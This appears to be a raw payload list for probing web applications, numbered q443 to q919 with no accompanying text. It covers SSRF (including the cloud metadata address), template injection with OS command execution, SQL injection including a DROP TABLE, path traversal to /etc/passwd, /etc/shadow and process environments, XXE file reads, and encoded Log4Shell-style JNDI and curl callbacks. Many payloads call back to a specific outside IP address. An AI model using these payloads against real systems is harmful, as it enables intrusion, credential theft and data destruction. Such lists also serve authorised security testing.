q443 [SSRF] target=http://127.0.0.1:8080/q443
q444 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q444
q445 [SSRF] callback=http://62.84.182.119:9999/q445
q446 [SSRF] next=http://62.84.182.119:9999/q446
q447 [SSRF] return=http://62.84.182.119:9999/q447
q448 [SSRF] website=http://62.84.182.119:9999/q448
q449 [SSRF] uri=http://62.84.182.119:9999/q449&format=json
q450 [SSRF] url=http://62.84.182.119:9999/q450
q451 [SSRF] redirect=http://62.84.182.119:9999/q451
q452 [SSRF] dest=http://62.84.182.119:9999/q452
q453 [SSRF] target=http://127.0.0.1:8080/q453
q454 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q454
q455 [SSRF] callback=http://62.84.182.119:9999/q455
q456 [SSRF] next=http://62.84.182.119:9999/q456
q457 [SSRF] return=http://62.84.182.119:9999/q457
q458 [SSRF] website=http://62.84.182.119:9999/q458
q459 [SSRF] uri=http://62.84.182.119:9999/q459&format=json
q460 [SSRF] url=http://62.84.182.119:9999/q460
q461 [SSRF] redirect=http://62.84.182.119:9999/q461
q462 [SSRF] dest=http://62.84.182.119:9999/q462
q463 [SSRF] target=http://127.0.0.1:8080/q463
q464 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q464
q465 [SSRF] callback=http://62.84.182.119:9999/q465
q466 [SSRF] next=http://62.84.182.119:9999/q466
q467 [SSRF] return=http://62.84.182.119:9999/q467
q468 [SSRF] website=http://62.84.182.119:9999/q468
q469 [SSRF] uri=http://62.84.182.119:9999/q469&format=json
q470 [SSRF] url=http://62.84.182.119:9999/q470
q471 [SSRF] redirect=http://62.84.182.119:9999/q471
q472 [SSRF] dest=http://62.84.182.119:9999/q472
q473 [SSRF] target=http://127.0.0.1:8080/q473
q474 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q474
q475 [SSRF] callback=http://62.84.182.119:9999/q475
q476 [SSRF] next=http://62.84.182.119:9999/q476
q477 [SSRF] return=http://62.84.182.119:9999/q477
q478 [SSRF] website=http://62.84.182.119:9999/q478
q479 [SSRF] uri=http://62.84.182.119:9999/q479&format=json
q480 [SSRF] url=http://62.84.182.119:9999/q480
q481 [SSRF] redirect=http://62.84.182.119:9999/q481
q482 [SSRF] dest=http://62.84.182.119:9999/q482
q483 [SSRF] target=http://127.0.0.1:8080/q483
q484 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q484
q485 [SSRF] callback=http://62.84.182.119:9999/q485
q486 [SSRF] next=http://62.84.182.119:9999/q486
q487 [SSRF] return=http://62.84.182.119:9999/q487
q488 [SSRF] website=http://62.84.182.119:9999/q488
q489 [SSRF] uri=http://62.84.182.119:9999/q489&format=json
q490 [SSRF] url=http://62.84.182.119:9999/q490
q491 [SSRF] redirect=http://62.84.182.119:9999/q491
q492 [SSRF] dest=http://62.84.182.119:9999/q492
q493 [SSRF] target=http://127.0.0.1:8080/q493
q494 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q494
q495 [SSRF] callback=http://62.84.182.119:9999/q495
q496 [SSRF] next=http://62.84.182.119:9999/q496
q497 [SSRF] return=http://62.84.182.119:9999/q497
q498 [SSRF] website=http://62.84.182.119:9999/q498
q499 [SSRF] uri=http://62.84.182.119:9999/q499&format=json

Server-Side Template Injection

q500 [SSTI] name={{7*7}}
q501 [SSTI] val={{config}}
q502 [SSTI] x={{self.__class__}}
q503 [SSTI] test={{config.__class__.__init__.__globals__}}
q504 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q505 [SSTI] input={{request.application.__globals__}}
q506 [SSTI] ref=${7*7}
q507 [SSTI] log=#{7*7}
q508 [SSTI] cmd=<%= 7*7 %>
q509 [SSTI] name={{lipsum.__globals__['os'].popen('echo q509').read()}}
q510 [SSTI] name={{7*7}}
q511 [SSTI] val={{config}}
q512 [SSTI] x={{self.__class__}}
q513 [SSTI] test={{config.__class__.__init__.__globals__}}
q514 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q515 [SSTI] input={{request.application.__globals__}}
q516 [SSTI] ref=${7*7}
q517 [SSTI] log=#{7*7}
q518 [SSTI] cmd=<%= 7*7 %>
q519 [SSTI] name={{lipsum.__globals__['os'].popen('echo q519').read()}}
q520 [SSTI] name={{7*7}}
q521 [SSTI] val={{config}}
q522 [SSTI] x={{self.__class__}}
q523 [SSTI] test={{config.__class__.__init__.__globals__}}
q524 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q525 [SSTI] input={{request.application.__globals__}}
q526 [SSTI] ref=${7*7}
q527 [SSTI] log=#{7*7}
q528 [SSTI] cmd=<%= 7*7 %>
q529 [SSTI] name={{lipsum.__globals__['os'].popen('echo q529').read()}}
q530 [SSTI] name={{7*7}}
q531 [SSTI] val={{config}}
q532 [SSTI] x={{self.__class__}}
q533 [SSTI] test={{config.__class__.__init__.__globals__}}
q534 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q535 [SSTI] input={{request.application.__globals__}}
q536 [SSTI] ref=${7*7}
q537 [SSTI] log=#{7*7}
q538 [SSTI] cmd=<%= 7*7 %>
q539 [SSTI] name={{lipsum.__globals__['os'].popen('echo q539').read()}}
q540 [SSTI] name={{7*7}}
q541 [SSTI] val={{config}}
q542 [SSTI] x={{self.__class__}}
q543 [SSTI] test={{config.__class__.__init__.__globals__}}
q544 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q545 [SSTI] input={{request.application.__globals__}}
q546 [SSTI] ref=${7*7}
q547 [SSTI] log=#{7*7}
q548 [SSTI] cmd=<%= 7*7 %>
q549 [SSTI] name={{lipsum.__globals__['os'].popen('echo q549').read()}}
q550 [SSTI] name={{7*7}}
q551 [SSTI] val={{config}}
q552 [SSTI] x={{self.__class__}}
q553 [SSTI] test={{config.__class__.__init__.__globals__}}
q554 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q555 [SSTI] input={{request.application.__globals__}}
q556 [SSTI] ref=${7*7}
q557 [SSTI] log=#{7*7}
q558 [SSTI] cmd=<%= 7*7 %>
q559 [SSTI] name={{lipsum.__globals__['os'].popen('echo q559').read()}}
q560 [SSTI] name={{7*7}}
q561 [SSTI] val={{config}}
q562 [SSTI] x={{self.__class__}}
q563 [SSTI] test={{config.__class__.__init__.__globals__}}
q564 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q565 [SSTI] input={{request.application.__globals__}}
q566 [SSTI] ref=${7*7}
q567 [SSTI] log=#{7*7}
q568 [SSTI] cmd=<%= 7*7 %>
q569 [SSTI] name={{lipsum.__globals__['os'].popen('echo q569').read()}}
q570 [SSTI] name={{7*7}}
q571 [SSTI] val={{config}}
q572 [SSTI] x={{self.__class__}}
q573 [SSTI] test={{config.__class__.__init__.__globals__}}
q574 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q575 [SSTI] input={{request.application.__globals__}}
q576 [SSTI] ref=${7*7}
q577 [SSTI] log=#{7*7}
q578 [SSTI] cmd=<%= 7*7 %>
q579 [SSTI] name={{lipsum.__globals__['os'].popen('echo q579').read()}}
q580 [SSTI] name={{7*7}}
q581 [SSTI] val={{config}}
q582 [SSTI] x={{self.__class__}}
q583 [SSTI] test={{config.__class__.__init__.__globals__}}
q584 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q585 [SSTI] input={{request.application.__globals__}}
q586 [SSTI] ref=${7*7}
q587 [SSTI] log=#{7*7}
q588 [SSTI] cmd=<%= 7*7 %>
q589 [SSTI] name={{lipsum.__globals__['os'].popen('echo q589').read()}}
q590 [SSTI] name={{7*7}}
q591 [SSTI] val={{config}}
q592 [SSTI] x={{self.__class__}}
q593 [SSTI] test={{config.__class__.__init__.__globals__}}
q594 [SSTI] data={{''.__class__.__mro__[1].__subclasses__()}}
q595 [SSTI] input={{request.application.__globals__}}
q596 [SSTI] ref=${7*7}
q597 [SSTI] log=#{7*7}
q598 [SSTI] cmd=<%= 7*7 %>
q599 [SSTI] name={{lipsum.__globals__['os'].popen('echo q599').read()}}

SQL Injection

q600 [SQLi] id=1' OR 1=1--
q601 [SQLi] id=1' UNION SELECT null,null--
q602 [SQLi] id=1'; DROP TABLE users--
q603 [SQLi] id=1' UNION SELECT 'q603',version()--
q604 [SQLi] id=1' AND SLEEP(5)--
q605 [SQLi] id=1' OR '1'='1
q606 [SQLi] id=1; SELECT pg_sleep(5)--q606
q607 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q608 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q608
q609 [SQLi] id=1%27%20OR%201=1--
q610 [SQLi] id=1' OR 1=1--
q611 [SQLi] id=1' UNION SELECT null,null--
q612 [SQLi] id=1'; DROP TABLE users--
q613 [SQLi] id=1' UNION SELECT 'q613',version()--
q614 [SQLi] id=1' AND SLEEP(5)--
q615 [SQLi] id=1' OR '1'='1
q616 [SQLi] id=1; SELECT pg_sleep(5)--q616
q617 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q618 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q618
q619 [SQLi] id=1%27%20OR%201=1--
q620 [SQLi] id=1' OR 1=1--
q621 [SQLi] id=1' UNION SELECT null,null--
q622 [SQLi] id=1'; DROP TABLE users--
q623 [SQLi] id=1' UNION SELECT 'q623',version()--
q624 [SQLi] id=1' AND SLEEP(5)--
q625 [SQLi] id=1' OR '1'='1
q626 [SQLi] id=1; SELECT pg_sleep(5)--q626
q627 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q628 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q628
q629 [SQLi] id=1%27%20OR%201=1--
q630 [SQLi] id=1' OR 1=1--
q631 [SQLi] id=1' UNION SELECT null,null--
q632 [SQLi] id=1'; DROP TABLE users--
q633 [SQLi] id=1' UNION SELECT 'q633',version()--
q634 [SQLi] id=1' AND SLEEP(5)--
q635 [SQLi] id=1' OR '1'='1
q636 [SQLi] id=1; SELECT pg_sleep(5)--q636
q637 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q638 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q638
q639 [SQLi] id=1%27%20OR%201=1--
q640 [SQLi] id=1' OR 1=1--
q641 [SQLi] id=1' UNION SELECT null,null--
q642 [SQLi] id=1'; DROP TABLE users--
q643 [SQLi] id=1' UNION SELECT 'q643',version()--
q644 [SQLi] id=1' AND SLEEP(5)--
q645 [SQLi] id=1' OR '1'='1
q646 [SQLi] id=1; SELECT pg_sleep(5)--q646
q647 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q648 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q648
q649 [SQLi] id=1%27%20OR%201=1--
q650 [SQLi] id=1' OR 1=1--
q651 [SQLi] id=1' UNION SELECT null,null--
q652 [SQLi] id=1'; DROP TABLE users--
q653 [SQLi] id=1' UNION SELECT 'q653',version()--
q654 [SQLi] id=1' AND SLEEP(5)--
q655 [SQLi] id=1' OR '1'='1
q656 [SQLi] id=1; SELECT pg_sleep(5)--q656
q657 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q658 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q658
q659 [SQLi] id=1%27%20OR%201=1--
q660 [SQLi] id=1' OR 1=1--
q661 [SQLi] id=1' UNION SELECT null,null--
q662 [SQLi] id=1'; DROP TABLE users--
q663 [SQLi] id=1' UNION SELECT 'q663',version()--
q664 [SQLi] id=1' AND SLEEP(5)--
q665 [SQLi] id=1' OR '1'='1
q666 [SQLi] id=1; SELECT pg_sleep(5)--q666
q667 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q668 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q668
q669 [SQLi] id=1%27%20OR%201=1--
q670 [SQLi] id=1' OR 1=1--
q671 [SQLi] id=1' UNION SELECT null,null--
q672 [SQLi] id=1'; DROP TABLE users--
q673 [SQLi] id=1' UNION SELECT 'q673',version()--
q674 [SQLi] id=1' AND SLEEP(5)--
q675 [SQLi] id=1' OR '1'='1
q676 [SQLi] id=1; SELECT pg_sleep(5)--q676
q677 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q678 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q678
q679 [SQLi] id=1%27%20OR%201=1--
q680 [SQLi] id=1' OR 1=1--
q681 [SQLi] id=1' UNION SELECT null,null--
q682 [SQLi] id=1'; DROP TABLE users--
q683 [SQLi] id=1' UNION SELECT 'q683',version()--
q684 [SQLi] id=1' AND SLEEP(5)--
q685 [SQLi] id=1' OR '1'='1
q686 [SQLi] id=1; SELECT pg_sleep(5)--q686
q687 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q688 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q688
q689 [SQLi] id=1%27%20OR%201=1--
q690 [SQLi] id=1' OR 1=1--
q691 [SQLi] id=1' UNION SELECT null,null--
q692 [SQLi] id=1'; DROP TABLE users--
q693 [SQLi] id=1' UNION SELECT 'q693',version()--
q694 [SQLi] id=1' AND SLEEP(5)--
q695 [SQLi] id=1' OR '1'='1
q696 [SQLi] id=1; SELECT pg_sleep(5)--q696
q697 [SQLi] id=1' AND 1=CONVERT(int,(SELECT @@version))--
q698 [SQLi] id=1' UNION ALL SELECT NULL,NULL,NULL--q698
q699 [SQLi] id=1%27%20OR%201=1--

Path Traversal

q700 [Traversal] file=../../../etc/passwd
q701 [Traversal] path=../../../../etc/shadow
q702 [Traversal] page=../../../../../etc/hosts
q703 [Traversal] doc=../../../../../../proc/self/environ
q704 [Traversal] template=../../../../../../../var/log/nginx/access.log
q705 [Traversal] file=....//....//....//etc/passwd
q706 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q707 [Traversal] page=..%252f..%252f..%252fetc/passwd
q708 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q709 [Traversal] file=../../../../etc/nginx/nginx.conf
q710 [Traversal] file=../../../../../etc/passwd
q711 [Traversal] path=../../../../../../etc/shadow
q712 [Traversal] page=../../../../../../../etc/hosts
q713 [Traversal] doc=../../../../../../../../proc/self/environ
q714 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
q715 [Traversal] file=....//....//....//etc/passwd
q716 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q717 [Traversal] page=..%252f..%252f..%252fetc/passwd
q718 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q719 [Traversal] file=../../../../../../etc/nginx/nginx.conf
q720 [Traversal] file=../../../../../../../etc/passwd
q721 [Traversal] path=../../../../../../../../etc/shadow
q722 [Traversal] page=../../../../../../../../../etc/hosts
q723 [Traversal] doc=../../../../../../../../../../proc/self/environ
q724 [Traversal] template=../../../var/log/nginx/access.log
q725 [Traversal] file=....//....//....//etc/passwd
q726 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q727 [Traversal] page=..%252f..%252f..%252fetc/passwd
q728 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q729 [Traversal] file=../../../../../../../../etc/nginx/nginx.conf
q730 [Traversal] file=../../../../../../../../../etc/passwd
q731 [Traversal] path=../../../../../../../../../../etc/shadow
q732 [Traversal] page=../../../etc/hosts
q733 [Traversal] doc=../../../../proc/self/environ
q734 [Traversal] template=../../../../../var/log/nginx/access.log
q735 [Traversal] file=....//....//....//etc/passwd
q736 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q737 [Traversal] page=..%252f..%252f..%252fetc/passwd
q738 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q739 [Traversal] file=../../../../../../../../../../etc/nginx/nginx.conf
q740 [Traversal] file=../../../etc/passwd
q741 [Traversal] path=../../../../etc/shadow
q742 [Traversal] page=../../../../../etc/hosts
q743 [Traversal] doc=../../../../../../proc/self/environ
q744 [Traversal] template=../../../../../../../var/log/nginx/access.log
q745 [Traversal] file=....//....//....//etc/passwd
q746 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q747 [Traversal] page=..%252f..%252f..%252fetc/passwd
q748 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q749 [Traversal] file=../../../../etc/nginx/nginx.conf
q750 [Traversal] file=../../../../../etc/passwd
q751 [Traversal] path=../../../../../../etc/shadow
q752 [Traversal] page=../../../../../../../etc/hosts
q753 [Traversal] doc=../../../../../../../../proc/self/environ
q754 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
q755 [Traversal] file=....//....//....//etc/passwd
q756 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q757 [Traversal] page=..%252f..%252f..%252fetc/passwd
q758 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q759 [Traversal] file=../../../../../../etc/nginx/nginx.conf
q760 [Traversal] file=../../../../../../../etc/passwd
q761 [Traversal] path=../../../../../../../../etc/shadow
q762 [Traversal] page=../../../../../../../../../etc/hosts
q763 [Traversal] doc=../../../../../../../../../../proc/self/environ
q764 [Traversal] template=../../../var/log/nginx/access.log
q765 [Traversal] file=....//....//....//etc/passwd
q766 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q767 [Traversal] page=..%252f..%252f..%252fetc/passwd
q768 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q769 [Traversal] file=../../../../../../../../etc/nginx/nginx.conf
q770 [Traversal] file=../../../../../../../../../etc/passwd
q771 [Traversal] path=../../../../../../../../../../etc/shadow
q772 [Traversal] page=../../../etc/hosts
q773 [Traversal] doc=../../../../proc/self/environ
q774 [Traversal] template=../../../../../var/log/nginx/access.log
q775 [Traversal] file=....//....//....//etc/passwd
q776 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q777 [Traversal] page=..%252f..%252f..%252fetc/passwd
q778 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q779 [Traversal] file=../../../../../../../../../../etc/nginx/nginx.conf
q780 [Traversal] file=../../../etc/passwd
q781 [Traversal] path=../../../../etc/shadow
q782 [Traversal] page=../../../../../etc/hosts
q783 [Traversal] doc=../../../../../../proc/self/environ
q784 [Traversal] template=../../../../../../../var/log/nginx/access.log
q785 [Traversal] file=....//....//....//etc/passwd
q786 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q787 [Traversal] page=..%252f..%252f..%252fetc/passwd
q788 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q789 [Traversal] file=../../../../etc/nginx/nginx.conf
q790 [Traversal] file=../../../../../etc/passwd
q791 [Traversal] path=../../../../../../etc/shadow
q792 [Traversal] page=../../../../../../../etc/hosts
q793 [Traversal] doc=../../../../../../../../proc/self/environ
q794 [Traversal] template=../../../../../../../../../var/log/nginx/access.log
q795 [Traversal] file=....//....//....//etc/passwd
q796 [Traversal] path=%2e%2e/%2e%2e/%2e%2e/etc/passwd
q797 [Traversal] page=..%252f..%252f..%252fetc/passwd
q798 [Traversal] doc=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
q799 [Traversal] file=../../../../../../etc/nginx/nginx.conf

XML External Entity

q800 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q800">
q801 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q802 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q802.dtd">
q803 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q804 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q804">
q805 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q805">
q806 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q807 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q807.dtd">
q808 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q809 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q809">
q810 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q810">
q811 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q812 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q812.dtd">
q813 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q814 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q814">
q815 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q815">
q816 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q817 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q817.dtd">
q818 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q819 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q819">
q820 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q820">
q821 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q822 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q822.dtd">
q823 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q824 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q824">
q825 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q825">
q826 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q827 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q827.dtd">
q828 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q829 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q829">
q830 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q830">
q831 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q832 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q832.dtd">
q833 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q834 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q834">
q835 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q835">
q836 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q837 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q837.dtd">
q838 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q839 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q839">
q840 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q840">
q841 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q842 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q842.dtd">
q843 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q844 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q844">
q845 [XXE] data=<!ENTITY xxe SYSTEM "http://62.84.182.119:9999/q845">
q846 [XXE] xml=<!ENTITY xxe SYSTEM "file:///etc/passwd">
q847 [XXE] input=<!ENTITY % remote SYSTEM "http://62.84.182.119:9999/q847.dtd">
q848 [XXE] doc=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://62.84.182.11
q849 [XXE] data=<!ENTITY xxe PUBLIC "any" "http://62.84.182.119:9999/q849">

Encoded Payload Variants

q850 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q851 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q852 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q853 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q854 [Encoded] q854=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q855 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q856 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q857 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q858 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q859 [Encoded] q859=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q860 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q861 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q862 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q863 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q864 [Encoded] q864=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q865 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q866 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q867 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q868 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q869 [Encoded] q869=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q870 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q871 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q872 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q873 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q874 [Encoded] q874=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q875 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q876 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q877 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q878 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q879 [Encoded] q879=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q880 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q881 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q882 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q883 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q884 [Encoded] q884=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q885 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q886 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q887 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q888 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q889 [Encoded] q889=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q890 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q891 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q892 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q893 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q894 [Encoded] q894=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D
q895 [Encoded] search%3D%24%7Bjndi%3Aldap%3A%2F%2F62.84.182.119%3A1389%2Fcallback%7D
q896 [Encoded] name%253Dtest%253Bcurl%2520http%253A%252F%252F62.84.182.119%253A9999%252Fenc
q897 [Encoded] id=$(ping%20-c1%2062.84.182.119)
q898 [Encoded] url=http:%2f%2f62%2e84%2e182%2e119:9999%2fssrf
q899 [Encoded] q899=name%3D%7B%7Bconfig.__class__.__init__.__globals__%7D%7D

Language-Specific Injection

q900 [Lang] cmd=__import__('os').system('echo q900')
q901 [Lang] val=eval('__import__("os").popen("id").read()')
q902 [Lang] x=system('echo q902')
q903 [Lang] data=passthru('echo q903')
q904 [Lang] ref=<?php system('echo q904'); ?>
q905 [Lang] exec=`echo q905`
q906 [Lang] cmd=%x(echo q906)
q907 [Lang] val=system('echo q907')
q908 [Lang] data=require('child_'+'process').exec('echo q908')
q909 [Lang] cmd=Runtime.getRuntime().exec('echo q909')
q910 [Lang] cmd=__import__('os').system('echo q910')
q911 [Lang] val=eval('__import__("os").popen("id").read()')
q912 [Lang] x=system('echo q912')
q913 [Lang] data=passthru('echo q913')
q914 [Lang] ref=<?php system('echo q914'); ?>
q915 [Lang] exec=`echo q915`
q916 [Lang] cmd=%x(echo q916)
q917 [Lang] val=system('echo q917')
q918 [Lang] data=require('child_'+'process').exec('echo q918')
q919 [Lang] cmd=Runtime.getRuntime().exec('echo q919')
